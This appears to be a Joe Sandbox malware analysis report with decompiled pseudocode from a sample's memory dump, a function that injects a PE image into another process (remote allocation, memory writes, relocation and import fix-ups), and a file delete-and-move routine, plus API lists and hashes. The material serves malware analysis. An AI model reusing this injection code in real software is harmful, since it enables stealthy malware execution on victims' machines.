				_t300 = VirtualAllocEx( *(_t508 + 0x70),  *(_t487 + 0x34),  *(_t487 + 0x50), 0x2000, 0x40);
				_v256 = _t300;
				if(_t300 == 0) {
					__eflags = GetLastError() - 0x1e7;
					if(__eflags != 0) {
						goto L21;
					}
					_t300 = VirtualAllocEx( *(_t508 + 0x70), 0,  *(_t487 + 0x50), 0x2000, 0x40);
					__eflags = _t300;
					_v256 = _t300;
					if(__eflags != 0) {
						goto L4;
					}
					goto L21;
				}
				L4:
				_v232 = _t300 -  *(_t487 + 0x34);
				_t302 = VirtualAllocEx( *(_t508 + 0x70), _t300,  *(_t487 + 0x54), 0x1000, 4);
				_v252 = _t302;
				if(_t302 == 0) {
					goto L21;
				}
				_v284 =  *((intOrPtr*)(_t487 + 0x80));
				_v288 = _t302;
				_v268 = E005C9E90(_t508,  *((intOrPtr*)(_t487 + 0x80)));
				_t469 =  &_v296;
				_v232 = _v288;
				_v228 =  *((intOrPtr*)(_t487 + 0x84));
				_v224 =  *((intOrPtr*)(_t487 + 0xd8));
				_v220 =  *((intOrPtr*)(_t487 + 0xdc));
				_v216 =  *((intOrPtr*)(_t487 + 0x78));
				_v212 =  *((intOrPtr*)(_t487 + 0x7c));
				 *((intOrPtr*)(_t487 + 0xd8)) = 0;
				 *((intOrPtr*)(_t487 + 0xdc)) = 0;
				 *((intOrPtr*)(_t487 + 0x84)) = 0;
				 *((intOrPtr*)(_t487 + 0x80)) = 0;
				 *((intOrPtr*)(_t487 + 0x7c)) = 0;
				 *((intOrPtr*)(_t487 + 0x78)) = 0;
				_t488 =  *(_t487 + 0x54);
				 *_t469 = 0;
				if(WriteProcessMemory( *(_t508 + 0x70), _v292, _t394, _t488, _t469) == 0 || _v292 != _t488) {
					goto L21;
				} else {
					_t312 = _v276;
					 *((intOrPtr*)(_t312 + 0x80)) = _v228;
					 *((intOrPtr*)(_t312 + 0x84)) = _v224;
					 *((intOrPtr*)(_t312 + 0xd8)) = _v220;
					 *((intOrPtr*)(_t312 + 0xdc)) = _v216;
					 *((intOrPtr*)(_t312 + 0x78)) = _v212;
					 *((intOrPtr*)(_t312 + 0x7c)) = _v208;
					_v292 = 0;
					if(VirtualProtectEx( *(_t508 + 0x70), _v252,  *(_t312 + 0x54), 2,  &_v292) == 0) {
						goto L21;
					}
					_t471 = _v276;
					_t316 = _t471 + ( *(_t471 + 0x14) & 0x0000ffff) + 0x18;
					_v272 = _t316;
					if( *(_t471 + 6) == 0) {
						L27:
						__eflags = _v232;
						if(_v232 == 0) {
							L41:
							_t490 = _v264;
							__eflags = _t490;
							if(_t490 == 0) {
								L64:
								__eflags =  *(_t508 + 0x68);
								if( *(_t508 + 0x68) == 0) {
									_t395 = _v212;
									_t317 = E005C9E90(_t508, _t395);
									__eflags = _t317;
									_v264 = _t317;
									if(__eflags == 0) {
										goto L21;
									}
									_t491 = _t317;
									_t318 = E005C9E90(_t508,  *((intOrPtr*)(_t317 + 0x1c)));
									_v288 = _t318;
									_v160 = _t318;
									_v160 = E005C9E90(_t508,  *((intOrPtr*)(_t491 + 0x20)));
									_v160 = E005C9E90(_t508,  *((intOrPtr*)(_t491 + 0x24)));
									_v156 = _t395;
									_v152 = _t395 + _v220;
									__eflags =  *(_t491 + 0x14);
									if( *(_t491 + 0x14) == 0) {
										_t321 = _t508 + 0xa0;
										L103:
										__eflags =  *_t321;
										if(__eflags == 0) {
											goto L21;
										}
										__eflags =  *(_t508 + 0xa4);
										if(__eflags == 0) {
											goto L21;
										}
										__eflags =  *(_t508 + 0xa8);
										if(__eflags == 0) {
											goto L21;
										}
										__eflags =  *(_t508 + 0xac);
										if(__eflags != 0) {
											goto L65;
										}
										goto L21;
									}
									_t430 = _v284;
									_t398 = 0;
									_v288 = _t508 + 0xa0;
									while(1) {
										_v156 =  &(_t430[1]);
										_t337 =  *_t430;
										__eflags = _t337;
										_v136 = _t337;
										if(_t337 == 0) {
											goto L100;
										}
										__eflags = _t337 - _v144;
										if(_t337 < _v144) {
											L87:
											_t431 =  *(_t491 + 0x18);
											__eflags = _t431;
											if(_t431 == 0) {
												goto L100;
											}
											_t476 = _v148;
											_t338 = 0;
											__eflags = 0;
											while(1) {
												__eflags = _t398 - ( *(_t476 + _t338 * 2) & 0x0000ffff);
												if(_t398 == ( *(_t476 + _t338 * 2) & 0x0000ffff)) {
													break;
												}
												_t338 = _t338 + 1;
												__eflags = _t338 - _t431;
												if(_t338 < _t431) {
													continue;
												}
												goto L100;
											}
											_v132 = 0;
											_v136 = E005C9E90(_t508,  *((intOrPtr*)(_v152 + _t338 * 4)));
											_t495 =  &_v128;
											E005D7160(_t495, 0x60);
											_t514 = _t514 + 8;
											_t342 =  *((intOrPtr*)( *0x5d9d8c))(_v136, _t495);
											__eflags = _t342;
											if(_t342 == 0) {
												 *_v296 = _v264 + _v144;
											} else {
												E005D7160(_t495, 0x61);
												_t514 = _t514 + 8;
												_t346 =  *0x5d9d8c(_v140, _t495);
												__eflags = _t346;
												if(_t346 == 0) {
													 *(_t508 + 0xa4) = _v272 + _v152;
												} else {
													E005D7160(_t495, 0x62);
													_t514 = _t514 + 8;
													_t350 =  *0x5d9d8c(_v148, _t495);
													__eflags = _t350;
													if(_t350 == 0) {
														_t352 = _v280 + _v160;
														__eflags = _t352;
														 *(_t508 + 0xa8) = _t352;
													} else {
														E005D7160(_t495, 0x63);
														_t514 = _t514 + 8;
														_t354 =  *0x5d9d8c(_v156, _t495);
														__eflags = _t354;
														if(_t354 == 0) {
															 *(_t508 + 0xac) = _v168 + _v288;
														}
													}
												}
											}
											goto L100;
										}
										__eflags = _t337 - _v140;
										if(_t337 < _v140) {
											goto L100;
										}
										goto L87;
										L100:
										_t491 = _v260;
										_t398 = _t398 + 1;
										__eflags = _t398 -  *(_t491 + 0x14);
										if(_t398 <  *(_t491 + 0x14)) {
											_t430 = _v156;
											continue;
										}
										_t321 = _v288;
										goto L103;
									}
								}
								L65:
								_t322 = _v276;
								__eflags =  *((short*)(_t322 + 6));
								if( *((short*)(_t322 + 6)) == 0) {
									L77:
									_t323 = _v256;
									 *((intOrPtr*)(_t508 + 0x5c)) = _t323;
									_v292 = 0;
									_push(0);
									_push(1);
									_push(_t323);
									_push( &_v292);
									_push(3);
									_push( *((intOrPtr*)( *(_t508 + 0x60) +  *((intOrPtr*)( *(_t508 + 0x60) + 0x3c)) + 0x28)) + _t323);
									_push(_t508);
									E005D3FA0();
									_t514 = _t514 + 0x1c;
									__eflags = _v292;
									if(_v292 != 0) {
										L79:
										 *((intOrPtr*)(_t508 + 0x80)) = 1;
										goto L23;
									}
									__eflags =  *(_t508 + 0x68);
									if(__eflags == 0) {
										goto L21;
									}
									goto L79;
								}
								_t493 = 0;
								__eflags = 0;
								_t397 = 8;
								do {
									_t473 = _v272;
									_t326 =  *(_t473 + _t397 + 0x1c);
									asm("bt eax, 0x1d");
									if(__eflags < 0) {
										asm("bt eax, 0x1e");
										if(__eflags >= 0) {
											__eflags = _t326;
											_t327 = 0x10;
											_t426 = 0x80;
											L74:
											_t328 =  <  ? _t426 : _t327;
											L75:
											_v128 = _t328;
											_v288 =  *((intOrPtr*)(_t473 + _t397));
											_v292 = 0;
											_v284 =  *(_t508 + 0x70);
											__eflags = VirtualProtectEx(_v284, _v256 +  *((intOrPtr*)(_t473 + _t397 + 4)), _v288, _t328,  &_v292);
											if(__eflags == 0) {
												goto L21;
											}
											goto L76;
										}
										_t328 = (_t326 >> 0x0000001a & 0xffffffe0) + 0x20;
										goto L75;
									}
									asm("bt eax, 0x1e");
									if(__eflags >= 0) {
										__eflags = _t326;
										_t327 = 1;
										_t426 = 8;
										goto L74;
									}
									_t328 = (_t326 >> 0x1f) + (_t326 >> 0x1f) + 2;
									goto L75;
									L76:
									_t493 = _t493 + 1;
									_t397 = _t397 + 0x28;
									__eflags = _t493 - ( *(_v276 + 6) & 0x0000ffff);
								} while (__eflags < 0);
								goto L77;
							}
							_t434 =  &_v184;
							while(1) {
								__eflags =  *_t490;
								if( *_t490 != 0) {
									goto L61;
								}
								L57:
								__eflags =  *(_t490 + 0x10);
								if( *(_t490 + 0x10) != 0) {
									goto L61;
								}
								__eflags =  *(_t490 + 8);
								if( *(_t490 + 8) != 0) {
									goto L61;
								}
								__eflags =  *(_t490 + 0xc);
								if( *(_t490 + 0xc) != 0) {
									goto L61;
								}
								__eflags =  *(_t490 + 4);
								if( *(_t490 + 4) == 0) {
									goto L64;
								}
								L61:
								_v164 = 0;
								 *((intOrPtr*)(_t434 + 0xc)) = 0;
								 *((intOrPtr*)(_t434 + 8)) = 0;
								 *((intOrPtr*)(_t434 + 4)) = 0;
								 *_t434 = 0;
								_t357 =  *(_t490 + 0xc);
								__eflags = _t357;
								if(_t357 == 0) {
									do {
										__eflags =  *_t490;
										if( *_t490 != 0) {
											goto L61;
										}
										goto L57;
									} while (_t357 == 0);
								}
								_t359 = E005C6740(_t508, __eflags, E005C9E90(_t508, _t357));
								__eflags = _t359;
								_v192 = _t359;
								if(__eflags != 0) {
									_t496 = _v264;
									_t360 =  *_t496;
									_v160 = _t360;
									__eflags = _t360;
									_t437 =  *(_t496 + 0x10);
									if(_t360 == 0) {
										_t360 = _t437;
										_v160 = _t437;
									}
									_v288 = _t437;
									_t361 = E005C9E90(_t508, _t360);
									_v184 = _t361;
									_v180 = _v292 + _v260;
									_t362 =  *_t361;
									__eflags = _t362;
									if(_t362 == 0) {
										L55:
										_t490 = _t496 + 0x14;
										__eflags = _t490;
										_t434 =  &_v184;
										_v264 = _t490;
										continue;
									} else {
										_t497 =  &_v164;
										while(1) {
											__eflags = _t362;
											if(__eflags < 0) {
												_t363 = _t362 & 0x0000ffff;
											} else {
												_t368 = E005C9E90(_t508, _t362);
												_v176 = _t368;
												_t363 = _t368 + 2;
											}
											_t364 = E005D3100(_t508, __eflags, _v184, _t363);
											__eflags = _t364;
											_v172 = _t364;
											if(__eflags == 0) {
												goto L21;
											}
											_v292 = 0;
											__eflags = WriteProcessMemory( *(_t508 + 0x70), _v176, _t497, 4,  &_v292);
											if(__eflags == 0) {
												goto L21;
											}
											__eflags = _v292 - 4;
											if(__eflags != 0) {
												goto L21;
											}
											_t367 = _v180;
											_v180 = _t367 + 4;
											_v176 = _v176 + 4;
											_t362 =  *(_t367 + 4);
											__eflags = _t362;
											if(_t362 != 0) {
												continue;
											}
											_t496 = _v264;
											goto L55;
										}
										goto L21;
									}
								}
								goto L21;
							}
						}
						_t369 = E005C9E90(_t508,  *((intOrPtr*)(_t471 + 0xa0)));
						__eflags = _t369;
						_v272 = _t369;
						if(_t369 == 0) {
							goto L41;
						}
						__eflags =  *_t369;
						if( *_t369 != 0) {
							do {
								_t370 = _t369 + 8;
								_t480 =  &_v200;
								_t448 =  *((intOrPtr*)(_t369 + 4)) + 0xfffffff8 >> 1;
								__eflags = _t448;
								_v204 = _t448;
								 *((intOrPtr*)(_t480 + 8)) = 0;
								 *_t480 = 0;
								 *((intOrPtr*)(_t480 + 0xc)) = 0;
								 *((intOrPtr*)(_t480 + 4)) = 0;
								_v168 = _t370;
								if(_t448 == 0) {
									goto L40;
								} else {
									goto L32;
								}
								do {
									L32:
									_t499 =  *_t370 & 0x0000ffff;
									_t372 = _t499 >> 0xc;
									__eflags = _t372 - 0xa;
									if(_t372 == 0xa) {
										_t501 = (_t499 & 0x00000fff) +  *_v268;
										_v200 = _t501;
										_t374 = E005C9E90(_t508, _t501);
										asm("adc eax, 0x0");
										_v196 =  *_t374 + _v236;
										_v192 =  *(_t374 + 4);
										_v296 = 0;
										__eflags = WriteProcessMemory( *(_t508 + 0x70), _t501 + _v260,  &_v196, 8,  &_v296);
										if(__eflags == 0) {
											goto L21;
										}
										__eflags = _v292 - 8;
										if(__eflags != 0) {
											goto L21;
										}
										goto L39;
									}
									__eflags = _t372 - 3;
									if(_t372 != 3) {
										goto L39;
									}
									_t504 = (_t499 & 0x00000fff) +  *_v268;
									_v200 = _t504;
									_v200 = _v236 +  *((intOrPtr*)(E005C9E90(_t508, _t504)));
									_v296 = 0;
									__eflags = WriteProcessMemory( *(_t508 + 0x70), _t504 + _v260,  &_v200, 4,  &_v296);
									if(__eflags == 0) {
										goto L21;
									}
									__eflags = _v292 - 4;
									if(__eflags == 0) {
										goto L39;
									}
									goto L21;
									L39:
									_t370 =  &(_v168[1]);
									_v168 = _t370;
									_t156 =  &_v204;
									 *_t156 = _v204 - 1;
									__eflags =  *_t156;
								} while ( *_t156 != 0);
								L40:
								_t449 = _v268;
								_t481 =  *((intOrPtr*)(_t449 + 4));
								_t369 = _t481 + _t449;
								_v268 = _t369;
								__eflags =  *(_t481 + _t449);
							} while ( *(_t481 + _t449) != 0);
						}
						goto L41;
					} else {
						_t401 = 0;
						_v284 = 1;
						while(1) {
							_t483 =  >  ?  *((intOrPtr*)(_t316 + _t401 + 8)) :  *((intOrPtr*)(_t316 + _t401 + 0x10));
							_v240 = _t483;
							_t383 =  *((intOrPtr*)(_t316 + _t401 + 0xc));
							_v236 = _t383;
							_t385 = VirtualAllocEx( *(_t508 + 0x70), _t383 + _v256, _t483, 0x1000, 4);
							_v248 = _t385;
							if(_t385 == 0) {
								goto L21;
							}
							_v244 = E005C3180(_v240, _v244);
							_v288 = _t401;
							E005D6610(_t386, 0, _v240);
							_t514 = _t514 + 0x14;
							_t506 = _v240;
							_v292 = 0;
							_t404 = _v288;
							__eflags = WriteProcessMemory( *(_t508 + 0x70), _v248, _v244, _t506,  &_v292);
							if(__eflags == 0) {
								goto L21;
							}
							__eflags = _v292 - _t506;
							if(__eflags != 0) {
								goto L21;
							}
							_t390 = _v272;
							_t507 =  *(_t390 + _t404 + 0x10);
							__eflags = _t507;
							if(_t507 == 0) {
								L15:
								_t471 = _v276;
								_t464 = _v284;
								__eflags = _t464 - ( *(_t471 + 6) & 0x0000ffff);
								if(_t464 >= ( *(_t471 + 6) & 0x0000ffff)) {
									goto L27;
								} else {
									_t316 = _v272;
									_t401 = _t404 + 0x28;
									__eflags = _t401;
									_v284 = _t464 + 1;
									continue;
								}
							}
							_t467 =  *(_t508 + 0x60) +  *((intOrPtr*)(_t390 + _t404 + 0x14));
							_v292 = 0;
							_t404 = _v288;
							__eflags = WriteProcessMemory( *(_t508 + 0x70), _v248, _t467, _t507,  &_v292);
							if(__eflags == 0) {
								goto L21;
							}
							__eflags = _v292 - _t507;
							if(__eflags != 0) {
								goto L21;
							}
							goto L15;
						}
						goto L21;
					}
				}
			}

0x005d092f
0x005d0931
0x005d093e
0x005d0943
0x005d094c
0x005d0c62
0x005d0c6b
0x005d0c6b
0x005d0958
0x005d095d
0x005d0960
0x005d0963
0x005d096f
0x005d0c30
0x005d0c30
0x005d0c37
0x005d0c3b
0x005d0c3b
0x005d0c40
0x005d0c40
0x005d0c46
0x005d0c49
0x005d0c4e
0x005d0c4e
0x005d0c57
0x005d0c5f
0x00000000
0x005d0c5f
0x005d0975
0x005d0978
0x005d097b
0x005d0986
0x00000000
0x00000000
0x005d099c
0x005d09a4
0x005d09a8
0x005d0c08
0x005d0c0d
0x00000000
0x00000000
0x005d0c1e
0x005d0c24
0x005d0c26
0x005d0c2a
0x00000000
0x00000000
0x00000000
0x005d0c2a
0x005d09ae
0x005d09b3
0x005d09c5
0x005d09cd
0x005d09d1
0x00000000
0x00000000
0x005d09df
0x005d09e4
0x005d09ed
0x005d09f5
0x005d09f9
0x005d0a03
0x005d0a0d
0x005d0a17
0x005d0a1e
0x005d0a25
0x005d0a2b
0x005d0a31
0x005d0a37
0x005d0a3d
0x005d0a43
0x005d0a46
0x005d0a49
0x005d0a4f
0x005d0a61
0x00000000
0x005d0a71
0x005d0a71
0x005d0a7d
0x005d0a87
0x005d0a91
0x005d0a9b
0x005d0aa5
0x005d0aac
0x005d0ab9
0x005d0acf
0x00000000
0x00000000
0x005d0ad5
0x005d0add
0x005d0ae1
0x005d0aea
0x005d0c6e
0x005d0c6e
0x005d0c73
0x005d0dca
0x005d0dca
0x005d0dce
0x005d0dd0
0x005d0f11
0x005d0f11
0x005d0f15
0x005d101f
0x005d1026
0x005d102b
0x005d102d
0x005d1031
0x00000000
0x00000000
0x005d1037
0x005d103e
0x005d1043
0x005d1047
0x005d1058
0x005d1069
0x005d1070
0x005d107b
0x005d1082
0x005d1086
0x005d11f9
0x005d11ff
0x005d11ff
0x005d1202
0x00000000
0x00000000
0x005d1208
0x005d120f
0x00000000
0x00000000
0x005d1215
0x005d121c
0x00000000
0x00000000
0x005d1222
0x005d1229
0x00000000
0x00000000
0x00000000
0x005d122f
0x005d108c
0x005d1096
0x005d1098
0x005d10a5
0x005d10a8
0x005d10af
0x005d10b1
0x005d10b3
0x005d10ba
0x00000000
0x00000000
0x005d10c0
0x005d10c7
0x005d10d6
0x005d10d6
0x005d10d9
0x005d10db
0x00000000
0x00000000
0x005d10e1
0x005d10e8
0x005d10e8
0x005d10ea
0x005d10ee
0x005d10f0
0x00000000
0x00000000
0x005d10f2
0x005d10f3
0x005d10f5
0x00000000
0x00000000
0x00000000
0x005d10f7
0x005d10fc
0x005d1118
0x005d1121
0x005d1129
0x005d112e
0x005d113e
0x005d1140
0x005d1142
0x005d11bd
0x005d1144
0x005d1147
0x005d114c
0x005d1157
0x005d115d
0x005d115f
0x005d11cc
0x005d1161
0x005d1164
0x005d1169
0x005d1174
0x005d117a
0x005d117c
0x005d11d8
0x005d11d8
0x005d11df
0x005d117e
0x005d1181
0x005d1186
0x005d1191
0x005d1197
0x005d1199
0x005d11a6
0x005d11a6
0x005d1199
0x005d117c
0x005d115f
0x00000000
0x005d1142
0x005d10c9
0x005d10d0
0x00000000
0x00000000
0x00000000
0x005d11e5
0x005d11e5
0x005d11e9
0x005d11ea
0x005d11ed
0x005d109e
0x00000000
0x005d109e
0x005d11f3
0x00000000
0x005d11f3
0x005d10a5
0x005d0f1b
0x005d0f1b
0x005d0f1f
0x005d0f24
0x005d0fd2
0x005d0fd2
0x005d0fd8
0x005d0fdb
0x005d0feb
0x005d0fec
0x005d0fee
0x005d0ff3
0x005d0ff4
0x005d0ff6
0x005d0ff7
0x005d0ff8
0x005d0ffd
0x005d1000
0x005d1004
0x005d1010
0x005d1010
0x00000000
0x005d1010
0x005d1006
0x005d100a
0x00000000
0x00000000
0x00000000
0x005d100a
0x005d0f2a
0x005d0f2a
0x005d0f2c
0x005d0f31
0x005d0f31
0x005d0f35
0x005d0f39
0x005d0f3d
0x005d0f4e
0x005d0f52
0x005d0f6d
0x005d0f6f
0x005d0f74
0x005d0f79
0x005d0f79
0x005d0f7c
0x005d0f7c
0x005d0f86
0x005d0f95
0x005d0f9d
0x005d0fb6
0x005d0fb8
0x00000000
0x00000000
0x00000000
0x005d0fb8
0x005d0f5a
0x00000000
0x005d0f5a
0x005d0f3f
0x005d0f43
0x005d0f5f
0x005d0f61
0x005d0f66
0x00000000
0x005d0f66
0x005d0f48
0x00000000
0x005d0fbe
0x005d0fc2
0x005d0fc3
0x005d0fca
0x005d0fca
0x00000000
0x005d0f31
0x005d0dd6
0x005d0eba
0x005d0eba
0x005d0ebd
0x00000000
0x00000000
0x005d0ebf
0x005d0ebf
0x005d0ec3
0x00000000
0x00000000
0x005d0ec5
0x005d0ec9
0x00000000
0x00000000
0x005d0ecb
0x005d0ecf
0x00000000
0x00000000
0x005d0ed1
0x005d0ed5
0x00000000
0x00000000
0x005d0ed7
0x005d0ed7
0x005d0ede
0x005d0ee1
0x005d0ee4
0x005d0ee7
0x005d0ee9
0x005d0eec
0x005d0eee
0x005d0eba
0x005d0eba
0x005d0ebd
0x00000000
0x00000000
0x00000000
0x005d0ebd
0x005d0eba
0x005d0efb
0x005d0f00
0x005d0f02
0x005d0f06
0x005d0de1
0x005d0de5
0x005d0de7
0x005d0dee
0x005d0df0
0x005d0df3
0x005d0df5
0x005d0df7
0x005d0df7
0x005d0dfe
0x005d0e05
0x005d0e0e
0x005d0e16
0x005d0e1a
0x005d0e1c
0x005d0e1e
0x005d0eaf
0x005d0eaf
0x005d0eaf
0x005d0eb2
0x005d0eb6
0x00000000
0x005d0e24
0x005d0e24
0x005d0e2b
0x005d0e2b
0x005d0e2d
0x005d0e40
0x005d0e2f
0x005d0e32
0x005d0e37
0x005d0e3b
0x005d0e3b
0x005d0e4a
0x005d0e4f
0x005d0e51
0x005d0e58
0x00000000
0x00000000
0x005d0e69
0x005d0e7d
0x005d0e7f
0x00000000
0x00000000
0x005d0e85
0x005d0e8a
0x00000000
0x00000000
0x005d0e90
0x005d0e9c
0x005d0ea0
0x005d0ea4
0x005d0ea7
0x005d0ea9
0x00000000
0x00000000
0x005d0eab
0x00000000
0x005d0eab
0x00000000
0x005d0e2b
0x005d0e1e
0x00000000
0x005d0f0c
0x005d0eba
0x005d0c81
0x005d0c86
0x005d0c88
0x005d0c8c
0x00000000
0x00000000
0x005d0c92
0x005d0c95
0x005d0ca1
0x005d0ca4
0x005d0ca7
0x005d0cb0
0x005d0cb2
0x005d0cb4
0x005d0cb8
0x005d0cbb
0x005d0cbd
0x005d0cc0
0x005d0cc3
0x005d0cca
0x00000000
0x00000000
0x00000000
0x00000000
0x005d0cd0
0x005d0cd0
0x005d0cd0
0x005d0cd5
0x005d0cd8
0x005d0cda
0x005d0d45
0x005d0d47
0x005d0d4c
0x005d0d5a
0x005d0d5d
0x005d0d65
0x005d0d70
0x005d0d84
0x005d0d86
0x00000000
0x00000000
0x005d0d8c
0x005d0d91
0x00000000
0x00000000
0x00000000
0x005d0d91
0x005d0cdc
0x005d0cde
0x00000000
0x00000000
0x005d0cf0
0x005d0cf2
0x005d0d02
0x005d0d11
0x005d0d25
0x005d0d27
0x00000000
0x00000000
0x005d0d2d
0x005d0d32
0x00000000
0x00000000
0x00000000
0x005d0d97
0x005d0d9e
0x005d0da1
0x005d0da8
0x005d0da8
0x005d0da8
0x005d0da8
0x005d0db2
0x005d0db2
0x005d0db6
0x005d0db9
0x005d0dbc
0x005d0dc0
0x005d0dc0
0x005d0ca1
0x00000000
0x005d0af0
0x005d0af2
0x005d0af5
0x005d0bc5
0x005d0bcf
0x005d0bd2
0x005d0bd6
0x005d0bda
0x005d0bee
0x005d0bf6
0x005d0bfa
0x005d0c00
0x005d0c00
0x005d0b0e
0x005d0b16
0x005d0b1e
0x005d0b23
0x005d0b26
0x005d0b35
0x005d0b3e
0x005d0b4c
0x005d0b4e
0x00000000
0x00000000
0x005d0b54
0x005d0b58
0x00000000
0x00000000
0x005d0b5e
0x005d0b62
0x005d0b66
0x005d0b68
0x005d0ba5
0x005d0ba5
0x005d0ba9
0x005d0bb1
0x005d0bb3
0x00000000
0x005d0bb9
0x005d0bb9
0x005d0bbe
0x005d0bbe
0x005d0bc1
0x00000000
0x005d0bc1
0x005d0bb3
0x005d0b70
0x005d0b7c
0x005d0b85
0x005d0b93
0x005d0b95
0x00000000
0x00000000
0x005d0b9b
0x005d0b9f
0x00000000
0x00000000
0x00000000
0x005d0b9f
0x00000000
0x005d0bc5
0x005d0aea

APIs

VirtualAllocEx.KERNEL32(?,?,?,00002000,00000040), ref: 005D099C
VirtualAllocEx.KERNEL32(?,00000000,?,00001000,00000004), ref: 005D09C5
WriteProcessMemory.KERNEL32(?,?,?,?,?,?), ref: 005D0A59
VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 005D0AC7
WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 005D0B46
WriteProcessMemory.KERNEL32(?,?,?,00000001,?), ref: 005D0B8D
VirtualAllocEx.KERNEL32(?,?,?,00001000,00000004), ref: 005D0BEE
GetLastError.KERNEL32 ref: 005D0C02
VirtualAllocEx.KERNEL32(?,00000000,?,00002000,00000040), ref: 005D0C1E
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,00000000,?), ref: 005D0D23
WriteProcessMemory.KERNEL32(?,?,?,00000008,00000000,00000000,?), ref: 005D0D82
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,00000000,?), ref: 005D0E77
VirtualProtectEx.KERNEL32(?,00000000,?,00000010,00000000,?,?,?,?), ref: 005D0FB0
lstrcmp.KERNEL32(?,?), ref: 005D1157
lstrcmp.KERNEL32(?,?), ref: 005D1174
lstrcmp.KERNEL32(?,?), ref: 005D1191

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: MemoryProcessVirtualWrite$Alloc$lstrcmp$Protect$ErrorLast
String ID:
API String ID: 4278583544-0
Opcode ID: 1ad83edd54a54e768f36cabc1e028bfc44699271b01a5c9c2ce5a4d9357f3ede
Instruction ID: 8f29d51dd69d1eb6784b7862973f9ed6c5cf67e18cfc770abbc2fdba9e7fbef6
Opcode Fuzzy Hash: 1ad83edd54a54e768f36cabc1e028bfc44699271b01a5c9c2ce5a4d9357f3ede
Instruction Fuzzy Hash: 46421170618702AFD734CF69C884B6BBBE5BB88704F14892FE589873A1D770E845DB52

Uniqueness

Uniqueness Score: -1.00%

Function 005D05C0, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 246
sleepfileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E005D05C0(void* __eflags) {
				WCHAR* _t32;
				signed int _t34;
				WCHAR* _t35;
				void* _t36;
				void* _t38;
				int _t39;
				void* _t44;
				void* _t45;
				void* _t50;
				void* _t54;
				void* _t56;
				short* _t59;
				WCHAR* _t60;
				void* _t61;
				void* _t62;
				void* _t64;
				signed int _t68;
				signed int _t69;
				void* _t77;
				signed int _t78;
				signed int _t83;
				signed short* _t84;
				WCHAR* _t85;
				signed int _t86;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				signed short _t98;
				WCHAR** _t99;
				signed short* _t100;
				signed short* _t101;
				WCHAR* _t102;
				void* _t104;
				signed int _t106;
				void* _t107;
				WCHAR** _t108;
				WCHAR** _t109;
				WCHAR** _t110;
				WCHAR** _t113;
				void* _t118;

				_t86 = 0;
				 *(_t107 + 4) = 0;
				 *((intOrPtr*)(_t107 + 0xc)) = 0;
				_t32 = E005CB7A0( *0x5d9c40);
				_t108 = _t107 + 4;
				if(_t32 == 0) {
					L57:
					return _t86;
				}
				_t102 = _t32;
				_t34 =  *_t32 & 0x0000ffff;
				 *_t108 = _t102;
				if(_t34 == 0) {
					_t60 =  &(_t108[4]);
					 *_t60 = 0;
					L23:
					_t35 = _t60;
					L24:
					 *_t35 = 0x74002e;
					_t35[2] = 0x70006d;
					_t35[4] = 0;
					_t36 = E005C9FD0(_t60);
					_t109 =  &(_t108[1]);
					if(_t36 != 0) {
						DeleteFileW(_t60);
					}
					_t109[2] = _t60;
					_t38 = E005D7BE0( &(_t109[3]), _t102,  &(_t109[1]),  &(_t109[3]));
					_t110 =  &(_t109[3]);
					if(_t38 == 0) {
						L30:
						_t61 = 0;
						while(1) {
							_t39 = MoveFileW(_t110[1], _t110[2]);
							_t86 = 0;
							if(_t39 != 0) {
								break;
							}
							Sleep(0x3e8);
							_t61 = _t61 + 1;
							if(_t61 < 0xa) {
								continue;
							}
							_t62 = 1;
							L35:
							Sleep(0x3e8);
							_t102 =  *_t110;
							_t40 = E005C9FD0(_t102);
							_t110 =  &(_t110[1]);
							if(_t62 != 0 || _t40 != 0) {
								goto L55;
							} else {
								goto L37;
							}
						}
						_t62 = 0;
						goto L35;
					} else {
						_t89 = 0;
						while(DeleteFileW(_t102) == 0) {
							Sleep(0x3e8);
							_t89 = _t89 + 1;
							if(_t89 < 0xa) {
								continue;
							}
							goto L30;
						}
						L37:
						_t44 = E005C6270(_t40, _t102, _t110[0x10b], _t110[0x10b]);
						_t113 =  &(_t110[3]);
						if(_t44 == 0) {
							L46:
							_t45 = E005C9FD0(_t102);
							_t110 =  &(_t113[1]);
							if(_t45 != 0) {
								DeleteFileW(_t102);
							}
							_t46 = _t110[1];
							if(_t110[1] == 0) {
								L51:
								_t86 = 0;
								_t104 = 0;
								while(MoveFileW(_t110[3],  *_t110) == 0) {
									Sleep(0x3e8);
									_t104 = _t104 + 1;
									if(_t104 < 0xa) {
										continue;
									}
									break;
								}
								L54:
								_t102 =  *_t110;
								goto L55;
							} else {
								_t71 = _t110[3];
								if(_t110[3] == 0) {
									goto L51;
								}
								E005C6270(_t46, _t102, _t46, _t71);
								_t110 =  &(_t110[3]);
								_t86 = 0;
								L55:
								E005C91E0(_t102);
								_t42 = _t110[2];
								if(_t110[2] != 0) {
									E005C91E0(_t42);
								}
								goto L57;
							}
						}
						Sleep(0xea60);
						_t50 = E005C9FD0(_t102);
						_t113 =  &(_t113[1]);
						if(_t50 == 0) {
							goto L46;
						}
						_t96 = _t113[0x10c];
						E005D1F50(_t113[0x10c]);
						if( *0x5d9c04 == 0) {
							L41:
							_t64 = 0x11;
							_t86 = 1;
							while(E005C7340(_t96) == 0) {
								E005D1F50(_t96);
								Sleep(0xea60);
								_t64 = _t64 - 1;
								if(_t64 > 1) {
									continue;
								}
								L44:
								_t54 = E005C7340(_t96);
								_t102 =  *_t113;
								if(_t54 == 0) {
									goto L46;
								}
								_t86 = 1;
								goto L55;
							}
							goto L54;
						}
						_t56 = E005D6E60(0, _t113[1], 0);
						_t113 =  &(_t113[3]);
						if(_t56 == 0) {
							goto L44;
						}
						goto L41;
					}
				}
				_t3 = _t102 - 2; // -2
				_t84 = _t3;
				_t77 = 1;
				do {
					_t98 = _t84[2] & 0x0000ffff;
